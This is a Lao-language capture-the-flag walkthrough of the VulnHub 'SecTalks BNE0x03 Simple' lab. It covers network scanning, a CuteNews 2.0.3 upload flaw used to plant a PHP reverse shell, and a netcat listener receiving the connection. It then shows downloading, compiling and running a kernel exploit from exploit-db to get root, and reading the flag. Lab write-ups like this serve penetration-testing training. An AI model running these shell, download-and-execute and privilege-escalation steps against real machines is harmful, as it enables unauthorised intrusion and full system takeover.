0

SecTalks: BNE0x03 – Simple ~ Walkthrough

ສະບາຍດີມື້ນີ້ຈະມາສາທິດການຜ່ານ SecTalks: BNE0x03 – Simple

ຜູ້ອ່ານສາມາດດາວໂຫຼດໄດ້ທີ່ລິ້ງນີ້ : https://www.vulnhub.com/entry/sectalks-bne0x03-simple,141/

ທຳອິດທຳອໍ່ ເລີຍແມ່ນເຮົາຈະຄົ້ນຫາເປົ້າໝາຍກ່ອນວ່າໃຊ້ IP ໃດ

netdiscover -i eth1 -r 192.168.153.0/24

1

ຖ້າແປັບໜຶ່ງເຮົາກໍ່ຈະໄດ້ IP ແລ້ວໃນນີ້ຈະແມ່ນເຄື່ອງ 192.168.153.103

ຕໍ່ໄປ, ເຮົາຈະມາຫາຂໍ້ມູນທີ່ຈຳເປັນອື່ນໆ ດ້ວຍ “nmap”

nmap -A -sV -p- 192.168.153.103

2

ເຮົາກໍ່ຈະເຫັນວ່າ IP ນີ້ມັນເປີດ Port 80 (HTTP) ໄວ້ຢູ່ ເນາະ ເຮົາກໍ່ເປີດ browser ເຂົ້າໄດ້ເລີຍ

ໄດ້ກໍ່ຈະໄດ້ໜ້າແບບນີ້.

3

ເຮົາສັງເກດເຫັນວ່າລະບົບນີ້ໃຊ້ CuteNews 2.0.3

ແອັດມິນກໍ່ລອງໄປຄົ້ນຫາໃນ Google ກໍ່ເຫັນວ່າລະບົບນີ້ມີຊ່ອງໂວ່ຢູ່  ລິ້ງ https://www.exploit-db.com/exploits/37474/.

ຫລັງຈາກທີ່ໄດ້ອ່ານໆເບິ່ງກໍ່ຮູ້ວ່າເຮົາສາມາດອັບໂຫລດໄຟລ໌ທີ່ບໍ່ແມ່ນ ໄຟລ໌ ຮູບ ຂຶ້ນ Server ໄດ້! ໂດຍແອັດໃຊ້ Burpsuite ໄວ້ດັກແພັກເກັດກ່ອນສົ່ງອອກໄປຫາ Server.

ສຳລັບວຽກນີ້ແອັດມິນໃຊ້ “php-reverse-shell” ໂຫລດຈາກ http://pentestmonkey.net/ ເນາະ.

ຫລັງຈາກແອັດອັບໂຫລດຜ່ານແລ້ວ ພັດວ່າເຂົ້າເບິ່ງ Shell ບໍ່ໄດ້ ແອັດກະງົງຢູ່ວ່າເປັນຫຍັງ ==

ແລ້ວກໍ່ມາສັງເກດເຫັນອາຫຍັງແປກໆຢູ່ url ຂອງໄຟລ໌ທີ່ອັບໂຫລດຂຶ້ນ ກໍ່ຄື http://192.168.56.102/uploads/avatar_frankkung_php-reverse-shell.php

ແຕ່ວ່າ! server ເປົ້າໝາຍແມ່ນ 192.168.153.103 ແອັດເລີຍລອງປ່ຽນ url ເບິ່ງແລ້ວກໍ່ Bang! ເຫັນຫອຍແລ້ວ :-|)

4

ຕໍ່ໄປ, ແອັດກະໃຊ້ Netcat ເປີດ port 1234 ຖ້າໃຫ້ມີ back connect ມາ

root@Frankkung:~# nc -lvp 1234
listening on [any] 1234 ...
192.168.153.103: inverse host lookup failed: Unknown host
connect to [192.168.153.102] from (UNKNOWN) [192.168.153.103] 47660
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
 01:08:33 up 51 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

ຫລັງຈາກໄດ້ ຫອຍ ລ່ະ ສິ່ງແລກທີ່ແອັດເຮັດຄືກວດວ່າ ລະບົບ ປະຕິບັດການ ເວີຫຍັງ

ແລ້ວກໍ່ໄດ້ Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux

ອີກຄັ້ງ! ແອັດໄປ Search ຫາໃນ GG ຫາ exploit ແລ້ວກໍ່ໄດ້  https://www.exploit-db.com/download/37292

ຫລັງຈາກນັ້ນກໍ່ ດາວໂຫລດມາ

wget https://www.exploit-db.com/download/37292
mv 37292 exploit.c   #ປ່ຽນຊື່
gcc exploit.c -o exploit   # ຄອມພາຍ ມັນ ສະ
chmod +x exploit #  ເພີ່ມ ສິດໜິດໜຶ່ງ
./exploit   # ຣັນ ແມ່ມ ເລີຍ!
$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# whoami
root

BOOM! I AM ROOT

ຫລັງຈາກນັ້ນ ເຮົາກໍ່ມີສິດ ເຂົ້າໄປອ່ານ Flag ໃນ /root ແລ້ວເນາະ!

# cat /root/flag.txt                       
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!

ງ່າຍແມ່ນບໍ!? ໄວ້ແອັດຈະເຮັດວີດີໂອເສີມອີກທີ ເນາະ
ຂອບໃຈທີ່ອ່ານຈົນສຸດ 😀

Frankkung

Frankkung

FULLSTACK DEVELOPER - PENETRATION TESTER